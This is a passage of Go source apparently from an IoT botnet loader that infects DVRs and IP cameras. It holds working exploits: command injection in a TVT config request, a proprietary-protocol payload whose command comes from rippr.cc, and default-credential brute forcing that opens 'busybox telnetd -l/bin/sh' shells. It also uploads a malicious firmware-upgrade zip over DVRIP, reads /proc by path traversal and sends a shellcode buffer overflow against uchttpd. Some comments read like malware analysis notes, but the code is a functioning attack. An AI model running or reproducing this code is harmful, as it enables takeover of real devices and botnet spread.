payload := "\x0c\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x21\x00\x02\x00\x01\x00\x04\x00\x50\x02\x00\x00\x50\x02\x00\x00\x00\x00\x00\x00\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x75\x74\x66\x2d\x38\x22\x3f\x3e\x3c\x72\x65\x71\x75\x65\x73\x74\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x73\x79\x73\x74\x65\x6d\x54\x79\x70\x65\x3d\x22\x4e\x56\x4d\x53\x2d\x39\x30\x30\x30\x22\x20\x63\x6c\x69\x65\x6e\x74\x54\x79\x70\x65\x3d\x22\x57\x45\x42\x22\x3e\x3c\x74\x79\x70\x65\x73\x3e\x3c\x66\x69\x6c\x74\x65\x72\x54\x79\x70\x65\x4d\x6f\x64\x65\x3e\x3c\x65\x6e\x75\x6d\x3e\x72\x65\x66\x75\x73\x65\x3c\x2f\x65\x6e\x75\x6d\x3e\x3c\x65\x6e\x75\x6d\x3e\x61\x6c\x6c\x6f\x77\x3c\x2f\x65\x6e\x75\x6d\x3e\x3c\x2f\x66\x69\x6c\x74\x65\x72\x54\x79\x70\x65\x4d\x6f\x64\x65\x3e\x3c\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x3e\x3c\x65\x6e\x75\x6d\x3e\x69\x70\x3c\x2f\x65\x6e\x75\x6d\x3e\x3c\x65\x6e\x75\x6d\x3e\x69\x70\x72\x61\x6e\x67\x65\x3c\x2f\x65\x6e\x75\x6d\x3e\x3c\x65\x6e\x75\x6d\x3e\x6d\x61\x63\x3c\x2f\x65\x6e\x75\x6d\x3e\x3c\x2f\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x3e\x3c\x2f\x74\x79\x70\x65\x73\x3e\x3c\x63\x6f\x6e\x74\x65\x6e\x74\x3e\x3c\x73\x77\x69\x74\x63\x68\x3e\x74\x72\x75\x65\x3c\x2f\x73\x77\x69\x74\x63\x68\x3e\x3c\x66\x69\x6c\x74\x65\x72\x54\x79\x70\x65\x20\x74\x79\x70\x65\x3d\x22\x66\x69\x6c\x74\x65\x72\x54\x79\x70\x65\x4d\x6f\x64\x65\x22\x3e\x72\x65\x66\x75\x73\x65\x3c\x2f\x66\x69\x6c\x74\x65\x72\x54\x79\x70\x65\x3e\x3c\x66\x69\x6c\x74\x65\x72\x4c\x69\x73\x74\x20\x74\x79\x70\x65\x3d\x22\x6c\x69\x73\x74\x22\x3e\x3c\x69\x74\x65\x6d\x54\x79\x70\x65\x3e\x3c\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x20\x74\x79\x70\x65\x3d\x22\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x22\x2f\x3e\x3c\x2f\x69\x74\x65\x6d\x54\x79\x70\x65\x3e\x3c\x69\x74\x65\x6d\x3e\x3c\x73\x77\x69\x74\x63\x68\x3e\x74\x72\x75\x65\x3c\x2f\x73\x77\x69\x74\x63\x68\x3e\x3c\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x3e
\x69\x70\x3c\x2f\x61\x64\x64\x72\x65\x73\x73\x54\x79\x70\x65\x3e\x3c\x69\x70\x3e\x24\x28"
635
payload += tvt4567Payload
636
payload += "\x3c\x2f\x69\x70\x3e\x3c\x2f\x69\x74\x65\x6d\x3e\x3c\x2f\x66\x69\x6c\x74\x65\x72\x4c\x69\x73\x74\x3e\x3c\x2f\x63\x6f\x6e\x74\x65\x6e\x74\x3e\x3c\x2f\x72\x65\x71\x75\x65\x73\x74\x3e\x00"
637
payload = base64.StdEncoding.EncodeToString([]byte(payload))
638
639
cntlen := strconv.Itoa(len(payload))
640
641
conn.Write([]byte("{D79E94C5-70F0-46BD-965B-E17497CCB598}"))
642
643
for {
644
tmpbuf := make([]byte, 128)
645
ln, err := conn.Read(tmpbuf)
646
if ln <= 0 || err != nil {
647
break
648
}
649
650
rdbuf = append(rdbuf, tmpbuf...)
651
if strings.Contains(string(rdbuf), "{D79E94C5-70F0-46BD-965B-E17497CCB598}") && state != 1 {
652
conn.Write([]byte("GET /saveSystemConfig HTTP/1.1\r\nAuthorization: Basic\r\nContent-type: text/xml\r\nContent-Length: " + cntlen + "\r\n{D79E94C5-70F0-46BD-965B-E17497CCB598} 2\r\n\r\n" + payload + "\r\n\r\n"))
653
zeroByte(rdbuf)
654
state = 1
655
continue
656
} else if strings.Contains(string(rdbuf), "200") && state == 1 {
657
fmt.Printf("\x1b[38;5;46mTvt-4567\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m payload sent to device\x1b[38;5;15m\r\n", conn.RemoteAddr().String())
658
conn.Close()
659
payloadSent++
660
return
661
}
662
}
663
664
conn.Close()
665
}
666
667
// infectFunctionMagicProto attacks a proprietary "\x5a\xa5"-framed DVR
// protocol on target. It first sends a 0x0120 probe and, if the reply
// echoes the same four-byte header, reconnects and sends one packet per
// entry in magicPacketIds: a fixed header, the packet-type byte, a
// timezone/NTP-style body ("GMT+09:00 Seoul", "time.nist.gov&"), then
// magicPayload + "f" (the shell command), then a trailer. After all 8 types
// have been sent it prints a "potential payload sent" line and increments
// payloadSent; any dial error or end of stream aborts. magicGroup.Done()
// is called on every exit path, so the caller is expected to have called
// magicGroup.Add(1).
//
// Analyst note: the command is fetched from rippr.cc, not from
// loaderDownloadServer; every attempt is a fresh TCP connection, so a
// burst of 9+ short connections per port is the network pattern.
func infectFunctionMagicProto(target string) {

	var (
		rdbuf []byte = []byte("")
		state = 0
	)

	conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
	if err != nil {
		magicGroup.Done()
		return
	}

	payloadOne := "\x5a\xa5\x06\x15\x00\x00\x00\x98\x00\x00\x00"
	payloadTwo := "\x00\x00\x00\x00\x00\x00\x00\x00\x47\x4d\x54\x2b\x30\x39\x3a\x30\x30\x20\x53\x65\x6f\x75\x6c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x74\x69\x6d\x65\x2e\x6e\x69\x73\x74\x2e\x67\x6f\x76\x26"
	payloadThree := "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00"

	// Probe: the service is recognised if it echoes this header back.
	conn.Write([]byte("\x5a\xa5\x01\x20\x00\x00\x00\x00"))

	for {
		tmpbuf := make([]byte, 128)
		ln, err := conn.Read(tmpbuf)
		if ln <= 0 || err != nil {
			break
		}

		rdbuf = append(rdbuf, tmpbuf...)
		if state == 0 && len(rdbuf) >= 4 && string(rdbuf[:4]) == "\x5a\xa5\x01\x20" {
			conn.Close()

			conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
			if err != nil {
				magicGroup.Done()
				return
			}

			payload := payloadOne
			payload += magicPacketIds[state]
			payload += payloadTwo
			payload += magicPayload + "f"
			payload += payloadThree

			conn.Write([]byte(payload))
			state++
			zeroByte(rdbuf)
			continue
		} else if state >= 1 {
			conn.Close()

			// All packet types tried: report and stop.
			if state == 8 {
				fmt.Printf("\x1b[38;5;46mMagic\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m potential payload sent to device\x1b[38;5;15m\r\n", target)
				payloadSent++
				magicGroup.Done()
				return
			}
			conn, err = net.DialTimeout("tcp", target, 10 * time.Second)
			if err != nil {
				magicGroup.Done()
				return
			}

			payload := payloadOne
			payload += magicPacketIds[state]
			payload += payloadTwo
			payload += magicPayload + "f"
			payload += payloadThree

			conn.Write([]byte(payload))
			state++
			zeroByte(rdbuf)
			continue
		}
	}

	conn.Close()
	magicGroup.Done()
	return
}
745
746
// infectFunctionLibdvrProto logs into a DVR's text-mode management console
// on host ("host:port") and, if it reaches a BusyBox shell, starts a
// telnetd on a random port in 9000..9998 bound to /bin/sh.
//
// Flow: send "/bin/busybox BOXOFABOX"; if the banner asks for a user name,
// answer "admin" and then, at the password prompt, the credential selected
// by attempt (0: "I0TO5Wv9", 1: "123456", 2: "admin"); an "admin$" prompt
// means authenticated. If the first reply is already
// "BOXOFABOX: applet not found" the console is an unauthenticated shell.
// Once in, it sends "shell", re-probes busybox, then
// "/bin/busybox telnetd -p<port> -l/bin/sh", "exit", "quit", and sleeps 3s.
//
// Returns (1, nil, password, port) on success and (0, nil, "", 0) on every
// failure; the error result is always nil. All I/O has 3–6 second deadlines.
//
// Analyst note: the literal token "BOXOFABOX" and a new telnetd on a
// 9000-range port with "-l/bin/sh" are the indicators for this path.
func infectFunctionLibdvrProto(host string, attempt int) (int, error, string, int) {

	var gotAdmin int = 0
	var gotShell int = 0
	var password string
	var rInt int = 0

	// Port for the spawned telnetd: 9000..9998.
	rInt = rand.Intn(9999 - 9000) + 9000

	conn, err := net.DialTimeout("tcp", host, time.Duration(10) * time.Second)
	if err != nil {
		return 0, nil, "", 0
	}

	defer conn.Close()
	conn.SetWriteDeadline(time.Now().Add(6 * time.Second))
	_, err = conn.Write([]byte("/bin/busybox BOXOFABOX\n"))
	if err != nil {
		conn.Close()
		return 0, nil, "", 0
	}

	conn.SetReadDeadline(time.Now().Add(6 * time.Second))

	first_buf := make([]byte, 256)
	l, err := conn.Read(first_buf)
	if err != nil || l <= 0 {
		conn.Close()
		return 0, nil, "", 0
	}

	if strings.Contains(string(first_buf), "user name") || strings.Contains(string(first_buf), "username") {
		_, err = conn.Write([]byte("admin\n"))
		if err != nil {
			conn.Close()
			return 0, nil, "", 0
		}
	} else {
		if strings.Contains(string(first_buf), "BOXOFABOX: applet not found") {
			// Console is already a shell — no login needed.
			gotShell = 1
		} else {
			// Unknown banner: send a newline and look again for a prompt.
			_, err = conn.Write([]byte("\n"))
			if err != nil {
				conn.Close()
				return 0, nil, "", 0
			}

			conn.SetReadDeadline(time.Now().Add(3 * time.Second))
			first_buf := make([]byte, 256)
			l, err := conn.Read(first_buf)
			if err != nil || l <= 0 {
				conn.Close()
				return 0, nil, "", 0
			}

			if !strings.Contains(string(first_buf), "user name") && !strings.Contains(string(first_buf), "username") {
				if strings.Contains(string(first_buf), "admin$") {
					gotAdmin = 1
				} else {
					conn.Close()
					return 0, nil, "", 0
				}
			} else {
				_, err = conn.Write([]byte("admin\n"))
				if err != nil {
					conn.Close()
					return 0, nil, "", 0
				}
			}
		}
	}

	if gotAdmin != 1 && gotShell != 1 {
		conn.SetReadDeadline(time.Now().Add(3 * time.Second))
		second_buf := make([]byte, 256)
		l2, err := conn.Read(second_buf)
		if err != nil || l2 <= 0 {
			conn.Close()
			return 0, nil, "", 0
		}

		if strings.Contains(string(second_buf), "pass word") || strings.Contains(string(second_buf), "password") {
			// One default credential per attempt; the caller loops 0..2.
			if attempt == 0 {
				password = "I0TO5Wv9"
			} else if attempt == 1 {
				password = "123456"
			} else if attempt == 2 {
				password = "admin"
			}

			_, err = conn.Write([]byte(password + "\n"))
			if err != nil {
				conn.Close()
				return 0, nil, "", 0
			}

			conn.SetReadDeadline(time.Now().Add(3 * time.Second))
			second_buf := make([]byte, 1024)
			l, err := conn.Read(second_buf)
			if err != nil || l <= 0 {
				conn.Close()
				return 0, nil, "", 0
			}

			if strings.Contains(string(second_buf), "admin$") {
				gotAdmin = 1
			} else {
				conn.Close()
				return 0, nil, "", 0
			}
		} else if strings.Contains(string(second_buf), "admin$") {
			gotAdmin = 1
		} else {
			conn.Close()
			return 0, nil, "", 0
		}
	}

	if gotAdmin == 1 || gotShell == 1 {
		conn.Write([]byte("shell\n"))
		conn.Write([]byte("/bin/busybox BOXOFABOX\n"))

		new_buf := make([]byte, 128)
		l, err := conn.Read(new_buf)
		if err != nil || l <= 0 {
			conn.Close()
			return 0, nil, "", 0
		}

		if strings.Contains(string(new_buf), "BOXOFABOX: applet not found") {
			// Shell confirmed: expose it on a fresh telnet port for telnetLoader.
			conn.Write([]byte("/bin/busybox telnetd -p" + strconv.Itoa(rInt) + " -l/bin/sh\n"))
			conn.Write([]byte("exit\n"))
			conn.Write([]byte("quit\n"))
			conn.Close()

			time.Sleep(3 * time.Second)
			return 1, nil, password, rInt
		} else {
			conn.Write([]byte("exit\n"))
			conn.Write([]byte("quit\n"))
			conn.Close()
			return 0, nil, "", 0
		}
	} else {
		conn.Write([]byte("quit\n"))
		conn.Close()
		return 0, nil, "", 0
	}
}
895
896
// infectFunctionLibdvr runs infectFunctionLibdvrProto against target
// ("host:port") with attempt 0, 1 and 2 in turn (one default credential
// each) and, on the first success, hands the newly opened telnet port on
// the same host to telnetLoader with arch "arm7" and loaderLibdvrTag.
// infectFunctionLibdvrProto never returns a non-nil error, so the err
// branch here is never taken in practice.
func infectFunctionLibdvr(target string) {

	splitStr := strings.Split(target, ":")
	for i := 0; i < 3; i++ {
		exploited, err, _, port := infectFunctionLibdvrProto(target, i)
		if err != nil {
			return
		}

		if exploited == 1 {
			fmt.Printf("\x1b[38;5;46mLibdvr\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m potential telnet shell\x1b[38;5;15m\r\n", target)
			telnetLoader(splitStr[0] + ":" + strconv.Itoa(port), 0, "arm7", loaderLibdvrTag)
			return
		}
	}
}
912
913
func infectFunctionDvrip(target string) {
914
915
var (
916
bytebuf []byte = []byte("")
917
adminPasswords []string = []string{"tlJwpbo6", "S2fGqNFs", "OxhlwSG8", "ORsEWe7l", "nTBCS19C"}
918
username string = "admin"
919
password string = ""
920
attempt int = 0
921
authed int = 0
922
)
923
924
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
925
if err != nil {
926
return
927
}
928
929
for
930
{
931
if attempt >= 5 {
932
break
933
} else {
934
password = adminPasswords[attempt]
935
}
936
937
conn.Write([]byte("\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe8\x03\x64\x00\x00\x00{ \"EncryptType\" : \"MD5\", \"LoginType\" : \"DVRIP-Web\", \"PassWord\" : \"" + password + "\", \"UserName\" : \"" + username + "\" }\x0a"))
938
939
for {
940
tmpbuf := make([]byte, 128)
941
ln, err := conn.Read(tmpbuf)
942
if ln <= 0 || err != nil {
943
break
944
}
945
946
bytebuf = append(bytebuf, tmpbuf...)
947
if strings.Contains(string(bytebuf), "}") {
948
break
949
}
950
}
951
952
dvrret, err := strconv.Atoi(getStringInBetween(string(bytebuf), "\"Ret\" : ", ", \"SessionID"))
953
if err != nil {
954
authed = 0
955
break
956
}
957
958
if dvrret == DVRIP_OK {
959
authed = 1
960
}
961
962
dvrret = DVRIP_NORESP
963
964
if authed == 1 {
965
break
966
}
967
968
attempt++
969
continue
970
}
971
972
if authed != 1 {
973
conn.Close()
974
return
975
}
976
977
conn.Write([]byte("\xff\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\xee\x03\x35\x00\x00\x00{ \"Name\" : \"KeepAlive\", \"SessionID\" : \"0x00000004\" }\x0a"))
978
zeroByte(bytebuf)
979
980
for {
981
tmpbuf := make([]byte, 128)
982
ln, err := conn.Read(tmpbuf)
983
if ln <= 0 || err != nil {
984
conn.Close()
985
return
986
}
987
988
bytebuf = append(bytebuf, tmpbuf...)
989
if strings.Contains(string(bytebuf), "}") {
990
break
991
}
992
}
993
994
zeroByte(bytebuf)
995
conn.Write([]byte("\xff\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x05\x73\x00\x00\x00{ \"Name\" : \"OPSystemUpgrade\", \"OPSystemUpgrade\" : { \"Action\" : \"Start\", \"Type\" : \"System\" }, \"SessionID\" : \"0x00000004\" }\x0a"))
996
997
for {
998
tmpbuf := make([]byte, 128)
999
ln, err := conn.Read(tmpbuf)
1000
if ln <= 0 || err != nil {
1001
conn.Close()
1002
return
1003
}
1004
1005
bytebuf = append(bytebuf, tmpbuf...)
1006
if strings.Contains(string(bytebuf), "}") {
1007
break
1008
}
1009
}
1010
1011
zeroByte(bytebuf)
1012
conn.Write([]byte("\xff\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf2\x05\x62\x01\x00\x00\x50\x4B\x03\x04\x14\x03\x00\x00\x08\x00\x2C\x87\x1A\x4F\x9A\xF8\xB3\x9E\xC6\x00\x00\x00\x23\x02\x00\x00\x0B\x00\x00\x00\x49\x6E\x73\x74\x61\x6C\x6C\x44\x65\x73\x63\xB5\x90\x3D\x0B\xC2\x30\x10\x86\x77\x7F\xC5\x91\xD9\x62\x15\x1C\x74\xAD\x88\xAE\x56\x5D\xC4\x21\x35\x87\x0D\xC6\xE4\x48\xE2\x47\x91\xFE\x77\xDB\x14\x11\xAB\x8B\x88\x37\x64\x79\xDE\x7B\x2E\x77\xB7\x0E\x00\x5B\xD1\xDE\x72\x81\x89\x39\x1E\xB9\x16\x6C\x0C\x9B\x0E\x54\x55\xB1\x50\xEC\x09\x58\x9A\xA3\x52\xAC\xFB\x20\xE9\xCE\x4A\xF2\x35\xF0\xA8\x34\x7A\x01\x11\xC1\x28\x8E\xFB\x10\x29\xE8\x65\x52\xF7\x5C\xCE\x42\xB8\xEC\x7E\xEF\xCC\x4E\xAE\xC8\xCC\x15\xFE\xE1\x76\x0A\x91\x60\x30\x1C\x0D\xE2\xF8\xF7\x1F\x7E\xB0\x55\xEF\xB6\xEE\x60\x33\x6E\xC5\x85\x5B\x0C\xA2\x83\xA4\x24\xC7\xDD\x81\x05\x94\x9E\x88\x8C\xF5\x53\xC5\x5D\xBE\x2C\x08\xDF\x4F\x1F\xD0\x7C\xF2\xD2\xDB\x1E\x30\xC1\x73\x48\xB4\xED\x6B\xD4\xC2\xD8\x36\x68\x36\x23\xEE\x65\xA6\x70\x8D\xD6\x49\xA3\xAB\x4C\xD4\x6F\xD0\x22\x69\xCD\x2A\xEF\x50\x4B\x01\x02\x3F\x03\x14\x03\x00\x00\x08\x00\x2C\x87\x1A\x4F\x9A\xF8\xB3\x9E\xC6\x00\x00\x00\x23\x02\x00\x00\x0B\x00\x24\x00\x00\x00\x00\x00\x00\x00\x20\x80\xA4\x81\x00\x00\x00\x00\x49\x6E\x73\x74\x61\x6C\x6C\x44\x65\x73\x63\x0A\x00\x20\x00\x00\x00\x00\x00\x01\x00\x18\x00\x00\xCA\x6F\xF3\x26\x5C\xD5\x01\x00\x40\x5B\x5C\x2F\x5C\xD5\x01\x80\xD6\xF3\x5C\x2F\x5C\xD5\x01\x50\x4B\x05\x06\x00\x00\x00\x00\x01\x00\x01\x00\x5D\x00\x00\x00\xEF\x00\x00\x00\x00\x00"))
1013
1014
for {
1015
tmpbuf := make([]byte, 128)
1016
ln, err := conn.Read(tmpbuf)
1017
if ln <= 0 || err != nil {
1018
conn.Close()
1019
return
1020
}
1021
1022
bytebuf = append(bytebuf, tmpbuf...)
1023
if strings.Contains(string(bytebuf), "}") {
1024
break
1025
}
1026
}
1027
1028
zeroByte(bytebuf)
1029
conn.Write([]byte("\xff\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x00\x01\xf2\x05\x00\x00\x00\x00"))
1030
1031
splitStr := strings.Split(target, ":")
1032
time.Sleep(10 * time.Second)
1033
1034
fmt.Printf("\x1b[38;5;46mDvrip\x1b[38;5;15m: \x1b[38;5;134m%s\x1b[38;5;15m potential telnet shell opened\x1b[38;5;15m\r\n", target)
1035
go telnetLoader(splitStr[0] + ":9001", 0, "arm7", loaderDvripTag)
1036
1037
conn.Write([]byte("\xFF\x01\x00\x00\x57\x00\x00\x00\x00\x00\x00\x00\x00\x00\xEA\x03\x27\x00\x00\x00{ \"Name\" : \"\", \"SessionID\" : \"0x00000004\" }\x0a"))
1038
conn.Close()
1039
return
1040
}
1041
1042
/* ------ END OF THE OTHER STUFF ------ */
1043
1044
func ucSofiaCheck(target string, pid string) (found int) {
1045
1046
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
1047
if err != nil {
1048
return -1
1049
}
1050
1051
defer conn.Close()
1052
tmp := make([]byte, 256)
1053
buf := make([]byte, 0, 512)
1054
1055
fmt.Fprintf(conn, "GET ../../proc/%s/cmdline HTTP\r\n\r\n", pid)
1056
for {
1057
n, err := conn.Read(tmp)
1058
if err != nil {
1059
break
1060
}
1061
1062
buf = append(buf, tmp[:n]...)
1063
}
1064
1065
if (strings.Contains(string(buf), "/var/Sofia") || strings.Contains(string(buf), "usr/bin/Sofia") || strings.Contains(string(buf), "system_sofia") || strings.Contains(string(buf), "/var/bin/system_sofia")) && !strings.Contains(string(buf), "dvrHelper") {
1066
return 1
1067
} else {
1068
return -1
1069
}
1070
}
1071
1072
func ucGuessSmaps(target string, pid string) (found int) {
1073
1074
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
1075
if err != nil {
1076
return -1
1077
}
1078
1079
defer conn.Close()
1080
tmp := make([]byte, 8096)
1081
buf := make([]byte, 0, 512)
1082
1083
fmt.Fprintf(conn, "GET ../../proc/%s/smaps HTTP\r\n\r\n", pid)
1084
for {
1085
n, err := conn.Read(tmp)
1086
if err != nil {
1087
break
1088
}
1089
1090
buf = append(buf, tmp[:n]...)
1091
}
1092
1093
smapsLines := strings.Split(string(buf), "\n")
1094
smapsCount := 0
1095
gotRegion := 0
1096
regionsAdded := 0
1097
1098
for i := 0; i < len(smapsLines); i++ {
1099
if !strings.Contains(string(smapsLines[i]), "rwxp") {
1100
continue
1101
}
1102
1103
smapsCount++
1104
}
1105
1106
smapsRegions := make([]*smapsRegion, smapsCount)
1107
for i := range smapsRegions {
1108
smapsRegions[i] = &smapsRegion{}
1109
}
1110
1111
for i := 0; i < len(smapsLines); i++ {
1112
if gotRegion == 8 || gotRegion == 0 {
1113
if !strings.Contains(string(smapsLines[i]), "rwxp") {
1114
continue
1115
}
1116
1117
region := strings.Split(string(smapsLines[i]), "-")
1118
smapsRegions[regionsAdded].region = hexToInt(region[0])
1119
1120
for q := 0; q < len(region); q++ {
1121
region[q] = ""
1122
}
1123
1124
gotRegion = 1
1125
} else {
1126
if gotRegion == 1 {
1127
startAt := 0
1128
endAt := 0
1129
1130
for q := 0; q < len(smapsLines[i]); q++ {
1131
if startAt == 0 {
1132
if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil {
1133
startAt = q
1134
continue
1135
}
1136
}
1137
if endAt == 0 && startAt > 0 {
1138
if smapsLines[i][q:q+1] == " " {
1139
endAt = q
1140
continue
1141
}
1142
}
1143
}
1144
1145
if startAt > 0 && endAt > 0 {
1146
smapsRegions[regionsAdded].size, _ = strconv.Atoi(smapsLines[i][startAt:endAt])
1147
gotRegion = 2
1148
continue
1149
}
1150
1151
} else if gotRegion == 2 {
1152
startAt := 0
1153
endAt := 0
1154
1155
for q := 0; q < len(smapsLines[i]); q++ {
1156
if startAt == 0 {
1157
if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil {
1158
startAt = q
1159
continue
1160
}
1161
}
1162
if endAt == 0 && startAt > 0 {
1163
if smapsLines[i][q:q+1] == " " {
1164
endAt = q
1165
continue
1166
}
1167
}
1168
}
1169
1170
if startAt > 0 && endAt > 0 {
1171
smapsRegions[regionsAdded].rss, _ = strconv.Atoi(smapsLines[i][startAt:endAt])
1172
gotRegion = 3
1173
continue
1174
}
1175
} else if gotRegion == 3 {
1176
startAt := 0
1177
endAt := 0
1178
1179
for q := 0; q < len(smapsLines[i]); q++ {
1180
if startAt == 0 {
1181
if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil {
1182
startAt = q
1183
continue
1184
}
1185
}
1186
if endAt == 0 && startAt > 0 {
1187
if smapsLines[i][q:q+1] == " " {
1188
endAt = q
1189
continue
1190
}
1191
}
1192
}
1193
1194
if startAt > 0 && endAt > 0 {
1195
smapsRegions[regionsAdded].pss, _ = strconv.Atoi(smapsLines[i][startAt:endAt])
1196
gotRegion = 4
1197
continue
1198
}
1199
} else if gotRegion == 4 {
1200
startAt := 0
1201
endAt := 0
1202
1203
for q := 0; q < len(smapsLines[i]); q++ {
1204
if startAt == 0 {
1205
if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil {
1206
startAt = q
1207
continue
1208
}
1209
}
1210
if endAt == 0 && startAt > 0 {
1211
if smapsLines[i][q:q+1] == " " {
1212
endAt = q
1213
continue
1214
}
1215
}
1216
}
1217
1218
if startAt > 0 && endAt > 0 {
1219
smapsRegions[regionsAdded].shared_clean, _ = strconv.Atoi(smapsLines[i][startAt:endAt])
1220
gotRegion = 5
1221
continue
1222
}
1223
} else if gotRegion == 5 {
1224
startAt := 0
1225
endAt := 0
1226
1227
for q := 0; q < len(smapsLines[i]); q++ {
1228
if startAt == 0 {
1229
if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil {
1230
startAt = q
1231
continue
1232
}
1233
}
1234
if endAt == 0 && startAt > 0 {
1235
if smapsLines[i][q:q+1] == " " {
1236
endAt = q
1237
continue
1238
}
1239
}
1240
}
1241
1242
if startAt > 0 && endAt > 0 {
1243
smapsRegions[regionsAdded].shared_ditry, _ = strconv.Atoi(smapsLines[i][startAt:endAt])
1244
gotRegion = 6
1245
continue
1246
}
1247
} else if gotRegion == 6 {
1248
startAt := 0
1249
endAt := 0
1250
1251
for q := 0; q < len(smapsLines[i]); q++ {
1252
if startAt == 0 {
1253
if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil {
1254
startAt = q
1255
continue
1256
}
1257
}
1258
if endAt == 0 && startAt > 0 {
1259
if smapsLines[i][q:q+1] == " " {
1260
endAt = q
1261
continue
1262
}
1263
}
1264
}
1265
1266
if startAt > 0 && endAt > 0 {
1267
smapsRegions[regionsAdded].private_clean, _ = strconv.Atoi(smapsLines[i][startAt:endAt])
1268
gotRegion = 7
1269
continue
1270
}
1271
} else if gotRegion == 7 {
1272
startAt := 0
1273
endAt := 0
1274
1275
for q := 0; q < len(smapsLines[i]); q++ {
1276
if startAt == 0 {
1277
if _, err := strconv.Atoi(smapsLines[i][q:q+1]); err == nil {
1278
startAt = q
1279
continue
1280
}
1281
}
1282
if endAt == 0 && startAt > 0 {
1283
if smapsLines[i][q:q+1] == " " {
1284
endAt = q
1285
continue
1286
}
1287
}
1288
}
1289
1290
if startAt > 0 && endAt > 0 {
1291
smapsRegions[regionsAdded].private_dirty, _ = strconv.Atoi(smapsLines[i][startAt:endAt])
1292
gotRegion = 8
1293
regionsAdded++
1294
continue
1295
}
1296
}
1297
1298
gotRegion++
1299
}
1300
}
1301
1302
for i := len(smapsRegions) - 7; i > 1; i-- {
1303
if smapsRegions[i].size == 8188 && smapsRegions[i + 1].size == 8188 && smapsRegions[i + 2].size == 8188 && smapsRegions[i + 3].size == 8188 && smapsRegions[i + 4].size == 8188 && smapsRegions[i + 5].size == 8188 && smapsRegions[i + 6].size == 8188 {
1304
if smapsRegions[i].rss == 4 && smapsRegions[i + 1].rss == 4 && smapsRegions[i + 2].rss == 4 && smapsRegions[i + 3].rss >= 8 && smapsRegions[i + 4].rss >= 4 && smapsRegions[i + 5].rss >= 4 && smapsRegions[i + 6].rss >= 8 {
1305
return int(smapsRegions[i + 3].region)
1306
}
1307
}
1308
}
1309
1310
return 0
1311
}
1312
1313
func ucSendBof(target string, offset int) {
1314
1315
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
1316
if err != nil {
1317
return
1318
}
1319
1320
defer conn.Close()
1321
1322
v := uint32(offset)
1323
offsetBuf := make([]byte, 4)
1324
binary.LittleEndian.PutUint32(offsetBuf, v)
1325
1326
conn.Write([]byte("GET "))
1327
conn.Write([]byte(uchttpdShellCode))
1328
1329
for i := 0; i < 299 - len(uchttpdShellCode); i ++ {
1330
conn.Write([]byte("a"))
1331
}
1332
1333
conn.Write([]byte(offsetBuf))
1334
conn.Write([]byte(" HTTP\r\n\r\n"))
1335
1336
buf := make([]byte, 0, 512)
1337
tmp := make([]byte, 256)
1338
1339
for {
1340
n, err := conn.Read(tmp)
1341
if err != nil {
1342
break
1343
}
1344
1345
buf = append(buf, tmp[:n]...)
1346
}
1347
1348
zeroByte(buf)
1349
zeroByte(tmp)
1350
}
1351
1352
func infectFunctionUchttpd(target string) {
1353
1354
var pidStrs[128] string
1355
var pidsFound int = 0
1356
1357
conn, err := net.DialTimeout("tcp", target, 10 * time.Second)
1358
if err != nil {
1359
return
1360
}
1361
1362
/* Dvrip check */
1363
go func() {
1364
ipslit := strings.Split(target, ":")
1365
tmpconn, err := net.DialTimeout("tcp", ipslit[0] + ":34567", 10 * time.Second)
1366
if err == nil {
1367
tmpconn.Close()
1368
infectFunctionDvrip(ipslit[0] + ":34567")
1369
}
1370
} ()
1371
/* ////////////// */
1372
1373
/* Libdvr check */
1374
go func() {
1375
ipslit := strings.Split(target, ":")
1376
tmpconn, err := net.DialTimeout("tcp", ipslit[0] + ":9527", 10 * time.Second)
1377
if err == nil {
1378
tmpconn.Close()
1379
infectFunctionLibdvr(ipslit[0] + ":9527")
1380
}
1381
} ()
1382
/* ////////////// */
1383
1384
tmp := make([]byte, 256)
1385
buf := make([]byte, 0, 512)
1386
1387
fmt.Fprintf(conn, "GET ../../proc/ HTTP\r\n\r\n")
1388
for {
1389
n, err := conn.Read(tmp)
1390
if err != nil {
1391
break
1392
}
1393
1394
buf = append(buf, tmp[:n]...)
1395
}
1396
1397
if !strings.Contains(string(buf), "Index of /mnt/web/") {
1398
zeroByte(tmp)
1399
zeroByte(buf)
1400
conn.Close()
1401
time.Sleep(10 * time.Second)
1402
return
1403
}
1404
1405
